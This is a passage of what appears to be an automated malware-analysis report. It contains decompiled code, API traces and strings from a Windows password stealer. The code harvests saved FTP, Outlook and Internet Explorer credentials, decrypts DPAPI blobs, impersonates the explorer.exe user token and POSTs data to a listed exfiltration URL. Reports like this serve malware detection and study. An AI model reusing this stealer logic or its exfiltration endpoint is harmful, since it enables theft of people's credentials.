                                                                        				_v40 = E00401C8E( *0x4140fe, _a8, _v12, 0);
                                                                        				_v44 = E00401C8E( *0x4140fe, _a8, _v16, 0);
                                                                        				_v48 = E00401C8E( *0x4140fe, _v28, _v20, 0);
                                                                        				_v52 = E00401C8E( *0x4140fe, _v28, _v24, 0);
                                                                        				_v56 = E00401C8E( *0x4140fe, _a8, _v32,  &_v68);
                                                                        				if(_v36 != 0 && _v48 != 0 && _v52 != 0 && E0040A774(_v48,  &_v64) != 0 && _v64 != 0 && E0040A774(_v52,  &_v60) != 0 && _v60 != 0) {
                                                                        					E00401486(_a4, 0xbeef0010);
                                                                        					E004014E8(_a4, _v36);
                                                                        					E004014E8(_a4, _v40);
                                                                        					E004014E8(_a4, _v44);
                                                                        					E004014BC(_a4, _v48, _v64);
                                                                        					E004014BC(_a4, _v52, _v60);
                                                                        					if(_v56 == 0 || _v68 != 4) {
                                                                        						E00401486(_a4, 0);
                                                                        					} else {
                                                                        						E00401486(_a4,  *_v56);
                                                                        					}
                                                                        				}
                                                                        				E004017D5(_v8);
                                                                        				E004017D5(_v12);
                                                                        				E004017D5(_v16);
                                                                        				E004017D5(_v20);
                                                                        				E004017D5(_v24);
                                                                        				E004017D5(_v28);
                                                                        				E004017D5(_v32);
                                                                        				E004017D5(_v36);
                                                                        				E004017D5(_v40);
                                                                        				E004017D5(_v44);
                                                                        				E004017D5(_v48);
                                                                        				E004017D5(_v52);
                                                                        				return E004017D5(_v56);
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • wsprintfA.USER32 ref: 0040A8FA
                                                                        • wsprintfA.USER32 ref: 0040A90D
                                                                        • wsprintfA.USER32 ref: 0040A920
                                                                        • wsprintfA.USER32 ref: 0040A933
                                                                        • wsprintfA.USER32 ref: 0040A946
                                                                        • wsprintfA.USER32 ref: 0040A959
                                                                        • wsprintfA.USER32 ref: 0040A96C
                                                                          • Part of subcall function 0040A774: lstrlenA.KERNEL32(?), ref: 0040A789
                                                                          • Part of subcall function 0040A774: LocalFree.KERNEL32(00000000), ref: 0040A874
                                                                          • Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wsprintf$Locallstrlen$AllocFree
                                                                        • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00403B74(void* __edx, void* __eflags, char* _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
                                                                        				long _v16;
                                                                        				void* _v20;
                                                                        				signed int _v40;
                                                                        				long _v44;
                                                                        				int _v48;
                                                                        				void* _v64;
                                                                        				intOrPtr _v68;
                                                                        				CHAR* _v72;
                                                                        				char* _v76;
                                                                        				int _v80;
                                                                        				long _v84;
                                                                        				long _v88;
                                                                        				intOrPtr _v92;
                                                                        				char _v96;
                                                                        				int _t83;
                                                                        				int _t89;
                                                                        				int _t91;
                                                                        				int _t95;
                                                                        				int _t99;
                                                                        				int _t104;
                                                                        				void* _t110;
                                                                        
                                                                        				_t110 = __edx;
                                                                        				_v88 = 0;
                                                                        				_t104 = 0;
                                                                        				_v68 = E004017EC(0x1000);
                                                                        				_v76 = E004017EC(0x1000);
                                                                        				_v72 = E004017EC(0x1000);
                                                                        				_v92 = E004017EC(0x1000);
                                                                        				_v96 = 0x1000;
                                                                        				memset( &_v64, 0, 0x3c << 0);
                                                                        				_v64 = 0x3c;
                                                                        				_push(_v68);
                                                                        				_pop( *_t11);
                                                                        				_push(_v76);
                                                                        				_pop( *_t13);
                                                                        				_v44 = 0xfff;
                                                                        				_v16 = 0xfff;
                                                                        				if(InternetCrackUrlA(_a4, 0, 0x80000000,  &_v64) == 0 || _v48 == 0) {
                                                                        				} else {
                                                                        					_v84 = 0xfff;
                                                                        					_t83 = InternetCreateUrlA( &_v64, 0x80000000, _v72,  &_v84);
                                                                        					__eflags = _t83;
                                                                        					if(_t83 != 0) {
                                                                        						 *_v76 = 0;
                                                                        						memset( &_v64, 0, 0x3c << 0);
                                                                        						_v64 = 0x3c;
                                                                        						_push(_v76);
                                                                        						_pop( *_t28);
                                                                        						_v44 = 0xfff;
                                                                        						_v16 = 0xfff;
                                                                        						_t89 = InternetCrackUrlA(_v72, 0, 0,  &_v64);
                                                                        						__eflags = _t89;
                                                                        						if(_t89 == 0) {
                                                                        							L7:
                                                                        							L21:
                                                                        							E004017D5(_v68);
                                                                        							E004017D5(_v72);
                                                                        							E004017D5(_v76);
                                                                        							E004017D5(_v92);
                                                                        							if(_v88 != 0) {
                                                                        								E004017D5(_v88);
                                                                        							}
                                                                        							return _t104;
                                                                        						}
                                                                        						__eflags = _v48;
                                                                        						if(_v48 != 0) {
                                                                        							_t91 =  &_v96;
                                                                        							_push(_t91);
                                                                        							_push(_v92);
                                                                        							_push(0);
                                                                        							L00410E54();
                                                                        							__eflags = _t91;
                                                                        							if(_t91 < 0) {
                                                                        								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)");
                                                                        							} else {
                                                                        								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, _v92);
                                                                        							}
                                                                        							_t95 = E00403749(_v40 & 0x0000ffff, 0, _v68, 0, _v40 & 0x0000ffff);
                                                                        							__eflags = _t95;
                                                                        							if(_t95 != 0) {
                                                                        								_v80 = _t95;
                                                                        								E00403B46(_v80);
                                                                        								_t99 = E004037CD(_v80, _v72, lstrlenA(_v72));
                                                                        								__eflags = _t99;
                                                                        								if(_t99 != 0) {
                                                                        									__eflags = _a12;
                                                                        									if(_a12 == 0) {
                                                                        										L18:
                                                                        										_t104 = _t99;
                                                                        										__eflags = _t104;
                                                                        										if(__eflags != 0) {
                                                                        											_t104 = E004039C1(_t110, __eflags, _v80, _a16,  &_v88);
                                                                        										}
                                                                        										L20:
                                                                        										_push(_v80);
                                                                        										L00410E72();
                                                                        										goto L21;
                                                                        									}
                                                                        									_t99 = E004037CD(_v80, _a8, _a12);
                                                                        									__eflags = _t99;
                                                                        									if(_t99 != 0) {
                                                                        										goto L18;
                                                                        									}
                                                                        									goto L20;
                                                                        								}
                                                                        								goto L20;
                                                                        							} else {
                                                                        								goto L21;
                                                                        							}
                                                                        						}
                                                                        						goto L7;
                                                                        					}
                                                                        				}
                                                                        			}
























                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403BFB
                                                                        • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403C26
                                                                        • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403C6C
                                                                        • ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 00403C89
                                                                        • wsprintfA.USER32 ref: 00403CA6
                                                                        • wsprintfA.USER32 ref: 00403CC6
                                                                          • Part of subcall function 00403B46: setsockopt.WSOCK32(00000000,0000FFFF,00000080,00000001,00000004), ref: 00403B6B
                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?,00001000,00001000,00001000,00001000,?,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php), ref: 00403CF1
                                                                        • closesocket.WSOCK32(?,?,?,00000000,?,?,?,00000000,?,00001000,00001000,00001000,00001000,?,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php), ref: 00403D3C
                                                                        Strings
                                                                        • <, xrefs: 00403C46
                                                                        • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 00403CB0
                                                                        • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s, xrefs: 00403C9E, 00403CBE
                                                                        • http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php, xrefs: 00403B7A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlensetsockopt
                                                                        • String ID: <$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s$http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E0040F5D2(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                        				char _v1028;
                                                                        				char _v2052;
                                                                        				char _v3076;
                                                                        				int _v3080;
                                                                        				int _v3084;
                                                                        				intOrPtr _v3088;
                                                                        				char _v3092;
                                                                        				char _v3096;
                                                                        				char _v3100;
                                                                        				intOrPtr _v3104;
                                                                        				void* _t56;
                                                                        				int _t61;
                                                                        				void* _t66;
                                                                        
                                                                        				_t66 = __ecx;
                                                                        				E00409EFB(_a4,  &_v1028, _a20);
                                                                        				E00409F46(_a4, _a8,  &_v2052, _a20);
                                                                        				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v3076, 0x3ff, 0, 0);
                                                                        				_v3092 = 0x10;
                                                                        				_v3088 = 2;
                                                                        				_v3084 = 0;
                                                                        				_v3080 = 0;
                                                                        				_t56 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v3100,  &_v3096,  &_v3092, 0);
                                                                        				if(_v3100 == 0 || _v3096 == 0) {
                                                                        					return _t56;
                                                                        				} else {
                                                                        					if(lstrcmpiA( &_v1028, "identification") == 0) {
                                                                        						L4:
                                                                        						_v3104 = 0xbeef0005;
                                                                        						if(lstrcmpiA( &_v2052, "inetcomm server passwords") == 0) {
                                                                        							L7:
                                                                        							if(_v3104 != 0xbeef0007) {
                                                                        								_t61 = E0040F4E3(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 1);
                                                                        							} else {
                                                                        								_t61 = E0040F4E3(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 0);
                                                                        							}
                                                                        							L10:
                                                                        							_push(_v3096);
                                                                        							L00410DCA();
                                                                        							return _t61;
                                                                        						}
                                                                        						_v3104 = 0xbeef0006;
                                                                        						if(lstrcmpiA( &_v2052, "outlook account manager passwords") == 0) {
                                                                        							goto L7;
                                                                        						}
                                                                        						_v3104 = 0xbeef0007;
                                                                        						_t61 = lstrcmpiA( &_v2052, "identities");
                                                                        						if(_t61 != 0) {
                                                                        							goto L10;
                                                                        						}
                                                                        						goto L7;
                                                                        					}
                                                                        					_t61 = lstrcmpiA( &_v1028, "identitymgr");
                                                                        					if(_t61 != 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					goto L4;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
                                                                          • Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D
                                                                          • Part of subcall function 00409F46: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F82
                                                                          • Part of subcall function 00409F46: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F8B
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F61B
                                                                        • lstrcmpiA.KERNEL32(?,identification), ref: 0040F69B
                                                                        • lstrcmpiA.KERNEL32(?,identitymgr,?,identification), ref: 0040F6B0
                                                                        • lstrcmpiA.KERNEL32(?,inetcomm server passwords,?,identification), ref: 0040F6D3
                                                                        • lstrcmpiA.KERNEL32(?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 0040F6F2
                                                                        • lstrcmpiA.KERNEL32(?,identities,?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 0040F711
                                                                        • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F772
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                                        • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                                        • API String ID: 636431001-4287852900
                                                                        • Opcode ID: 6670717f35b3c7cb924859923af077f70eb34972e318cc14aa56e4278a2d0328
                                                                        • Instruction ID: ea03687d9fb03fd5940d117c1db2d536975b738c704b47cbe732ea10429568b2
                                                                        • Opcode Fuzzy Hash: 6670717f35b3c7cb924859923af077f70eb34972e318cc14aa56e4278a2d0328
                                                                        • Instruction Fuzzy Hash: 2C412B7180021DEBEF319F91CE41FDA7B7ABF05304F0041A6BA08B6091DB799AD99F95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0040A1A9(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                        				char _v1028;
                                                                        				char _v2052;
                                                                        				int _v2056;
                                                                        				int _v2060;
                                                                        				intOrPtr _v2064;
                                                                        				char _v2068;
                                                                        				char _v2072;
                                                                        				char _v2076;
                                                                        				void* _v2080;
                                                                        				char _v2084;
                                                                        				void* _v2088;
                                                                        				char _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				void* _t53;
                                                                        				int _t58;
                                                                        
                                                                        				E00409EFB(_a4,  &_v1028, _a20);
                                                                        				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
                                                                        				_v2068 = 0x10;
                                                                        				_v2064 = 2;
                                                                        				_v2060 = 0;
                                                                        				_v2056 = 0;
                                                                        				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
                                                                        				if(_v2076 == 0 || _v2072 == 0) {
                                                                        					return _t53;
                                                                        				}
                                                                        				_v2096 = 0xbeef0000;
                                                                        				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
                                                                        					L5:
                                                                        					_t58 = StrStrIA( &_v2052, "DPAPI: ");
                                                                        					if(_t58 == 0) {
                                                                        						_t58 = E0040A13B(_v2096, _a12, _v2072, _v2076, _a16);
                                                                        					} else {
                                                                        						if( *0x41442d != 0) {
                                                                        							_push(_v2076);
                                                                        							_pop( *_t29);
                                                                        							_push(_v2072);
                                                                        							_pop( *_t31);
                                                                        							_t58 =  *0x41442d( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
                                                                        							if(_t58 != 0) {
                                                                        								E0040A13B(_v2096, _a12, _v2088, _v2092, _a16);
                                                                        								_t58 = LocalFree(_v2088);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L11:
                                                                        					_push(_v2072);
                                                                        					L00410DCA();
                                                                        					return _t58;
                                                                        				}
                                                                        				_v2096 = 0xbeef0001;
                                                                        				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				_v2096 = 0xbeef0002;
                                                                        				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
                                                                        				if(_t58 != 0) {
                                                                        					goto L11;
                                                                        				}
                                                                        				goto L5;
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
                                                                          • Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A1DD
                                                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A267
                                                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A286
                                                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A2A5
                                                                        • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A2BE
                                                                        • LocalFree.KERNEL32(?), ref: 0040A331
                                                                        • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A35B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$Local
                                                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                                        • API String ID: 1761448497-3076635702
                                                                        • Opcode ID: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
                                                                        • Instruction ID: d0109d7229b507364c02bffd69db74d2b73ca55b941890eea464c4d2f255e551
                                                                        • Opcode Fuzzy Hash: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
                                                                        • Instruction Fuzzy Hash: CE415E7240021DEADF219F50CC42FDA77B9BF08304F0480E6B64475190DB759AE58FD9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040BEFE(void* __eax, void* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				char _v40;
                                                                        				char* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _t49;
                                                                        				int _t62;
                                                                        				int _t76;
                                                                        				void* _t79;
                                                                        
                                                                        				_t79 = __ecx;
                                                                        				if(_a16 != 0) {
                                                                        					_t49 = _a16;
                                                                        					if( *0x419158 < _t49 &&  *0x41915c < _t49 &&  *0x419160 < _t49) {
                                                                        						E0040B1AB(_a12,  *0x419158,  &_v8,  &_v12,  &_v16);
                                                                        						E0040B1AB(_a12,  *0x419160,  &_v20,  &_v24,  &_v28);
                                                                        						_t49 = E0040B1AB(_a12,  *0x41915c,  &_v32,  &_v36,  &_v40);
                                                                        						if(_v8 != 0 && _v32 != 0) {
                                                                        							_v44 = E004017EC(_v8 + 1);
                                                                        							_t62 = E00401823(_v16, _v44, _v8);
                                                                        							_v48 = 0;
                                                                        							_v52 = 0;
                                                                        							if( *0x415824 != 0) {
                                                                        								if( *0x415824 != 1) {
                                                                        									if( *0x415824 == 2) {
                                                                        										_t62 = 0;
                                                                        									}
                                                                        								} else {
                                                                        									_t62 = StrCmpNIA(_v44, "ftp.", lstrlenA("ftp."));
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = StrCmpNIA(_v44, "ftp://", lstrlenA("ftp://"));
                                                                        								if(_t76 != 0) {
                                                                        									_t76 = StrCmpNIA(_v44, "http://", lstrlenA("http://"));
                                                                        								}
                                                                        								_t62 = _t76;
                                                                        								if(_t62 != 0) {
                                                                        									_t62 = StrCmpNIA(_v44, "https://", lstrlenA("https://"));
                                                                        								}
                                                                        							}
                                                                        							if(_t62 == 0) {
                                                                        								if(_v20 != 0) {
                                                                        									_v48 = E00408FA6(_t79, _v28, _v20);
                                                                        								}
                                                                        								_v52 = E00408FA6(_t79, _v40, _v32);
                                                                        								if(_v44 != 0 && _v52 != 0) {
                                                                        									E00401486(_a8, _a20);
                                                                        									E004014E8(_a8, _v44);
                                                                        									E004014E8(_a8, _v48);
                                                                        									E004014E8(_a8, _v52);
                                                                        								}
                                                                        							}
                                                                        							E004017D5(_v48);
                                                                        							E004017D5(_v52);
                                                                        							return E004017D5(_v44);
                                                                        						}
                                                                        					}
                                                                        					return _t49;
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000001), ref: 0040BFCE
                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFDC
                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFEA
                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFF8
                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040C006
                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040C014
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: ftp.$ftp://$http://$https://
                                                                        • API String ID: 1659193697-2878239594
                                                                        • Opcode ID: 2ceeb25bf737fe7d7565a17e9daf5e1d3cf8b9acac254303795ed114300c450e
                                                                        • Instruction ID: 2e0af54665fa65f75f976fb34723a380399be05cd310afd3f545fa98bd27941c
                                                                        • Opcode Fuzzy Hash: 2ceeb25bf737fe7d7565a17e9daf5e1d3cf8b9acac254303795ed114300c450e
                                                                        • Instruction Fuzzy Hash: C941FC7280010AEBDF11AFE1DD45AEE7BB9AB08314F14823BF510B11B1D77D49A0EB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040260B(char* _a4, char* _a8, int _a12) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				char _v273;
                                                                        				CHAR* _v280;
                                                                        				long _t29;
                                                                        				CHAR* _t36;
                                                                        				void* _t37;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        
                                                                        				_t48 = 0;
                                                                        				if(RegCreateKeyA( *0x4140fe, "Software\\WinRAR",  &_v8) == 0) {
                                                                        					if(RegSetValueExA(_v8, _a4, 0, 3, _a8, _a12) == 0) {
                                                                        						_t48 = 1;
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        				}
                                                                        				_t49 = _t48;
                                                                        				if(_t49 == 0) {
                                                                        					_t29 = GetTempPathA(0x104,  &_v273);
                                                                        					if(_t29 != 0 && _t29 <= 0x104) {
                                                                        						CreateDirectoryA( &_v273, 0);
                                                                        						if(E004024D7( &_v273) != 0) {
                                                                        							_t36 = E00401D15( &_v273, _a4);
                                                                        						} else {
                                                                        							_t36 = E00401D69(E00401D15( &_v273, "\\"), _a4);
                                                                        						}
                                                                        						_v280 = _t36;
                                                                        						_t37 = CreateFileA(_v280, 0xc0000000, 3, 0, 2, 0, 0);
                                                                        						_v12 = _t37;
                                                                        						if(_t37 + 1 != 0) {
                                                                        							_t49 = E004013C2(_v12, _a8, _a12);
                                                                        							CloseHandle(_v12);
                                                                        						}
                                                                        						_t49 = _t49;
                                                                        						if(_t49 == 0) {
                                                                        							DeleteFileA(_v280);
                                                                        						}
                                                                        						E004017D5(_v280);
                                                                        					}
                                                                        				}
                                                                        				return _t49;
                                                                        			}













                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 00402626
                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 0040263F
                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,00000000,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 0040264C
                                                                        • GetTempPathA.KERNEL32(00000104,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 00402665
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,00000104,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 00402686
                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?,?,004106C7), ref: 004026E1
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 004026FF
                                                                        • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?), ref: 0040270E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
                                                                        • String ID: Software\WinRAR
                                                                        • API String ID: 3443402316-224198155
                                                                        • Opcode ID: 1107d3a25441767015e62f211fafef4a9089e3f7bb7bd245d32c9b34d5f5b1f3
                                                                        • Instruction ID: 17b1f1f750073906f68301a3bf6da54a844cbe047f9a048bb246b4ff058c1830
                                                                        • Opcode Fuzzy Hash: 1107d3a25441767015e62f211fafef4a9089e3f7bb7bd245d32c9b34d5f5b1f3
                                                                        • Instruction Fuzzy Hash: C7219F71A4020CBBDF21AFE1DD86FDD7A29AF14748F1004B6B604B50E1E6F99AD09B58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00402D57(void* __ebx) {
                                                                        				int _t25;
                                                                        				void* _t33;
                                                                        				void* _t36;
                                                                        				void* _t45;
                                                                        				void* _t49;
                                                                        				int _t51;
                                                                        				void* _t52;
                                                                        
                                                                        				_t49 = __ebx;
                                                                        				while(1) {
                                                                        					L15:
                                                                        					while(1) {
                                                                        						L17:
                                                                        						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                        						L1:
                                                                        						if(_t25 != 0) {
                                                                        							L2:
                                                                        							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
                                                                        								L17:
                                                                        								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                        								goto L1;
                                                                        							} else {
                                                                        								L3:
                                                                        								 *(_t52 - 0x13c) = 0;
                                                                        								_t33 =  *0x4143d5( *(_t52 - 0x12c), _t52 - 0x13c);
                                                                        								_t51 =  *(_t52 - 0x13c);
                                                                        								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
                                                                        									continue;
                                                                        								} else {
                                                                        									L5:
                                                                        									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
                                                                        									if(_t36 == 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										L6:
                                                                        										 *(_t52 - 8) = _t36;
                                                                        										if(OpenProcessToken( *(_t52 - 8), 0x201eb, _t52 - 4) == 0) {
                                                                        											CloseHandle( *(_t52 - 8));
                                                                        											continue;
                                                                        											do {
                                                                        												do {
                                                                        													do {
                                                                        														goto L17;
                                                                        													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
                                                                        													goto L3;
                                                                        												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
                                                                        												goto L5;
                                                                        											} while (_t36 == 0);
                                                                        											goto L6;
                                                                        										} else {
                                                                        											if(ImpersonateLoggedOnUser( *(_t52 - 4)) == 0) {
                                                                        												CloseHandle( *(_t52 - 4));
                                                                        												CloseHandle( *(_t52 - 8));
                                                                        												goto L15;
                                                                        											} else {
                                                                        												_t49 = _t49 + 1;
                                                                        												 *(_t52 - 0x140) = 0;
                                                                        												_t45 = _t52 - 0x140;
                                                                        												_push(_t45);
                                                                        												_push(0xf003f);
                                                                        												L00410E12();
                                                                        												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
                                                                        													 *0x4140fe =  *(_t52 - 0x140);
                                                                        												}
                                                                        												if( *((intOrPtr*)(_t52 + 8)) != 0) {
                                                                        													 *__eax =  *(_t52 - 4);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						CloseHandle( *(_t52 - 0x138));
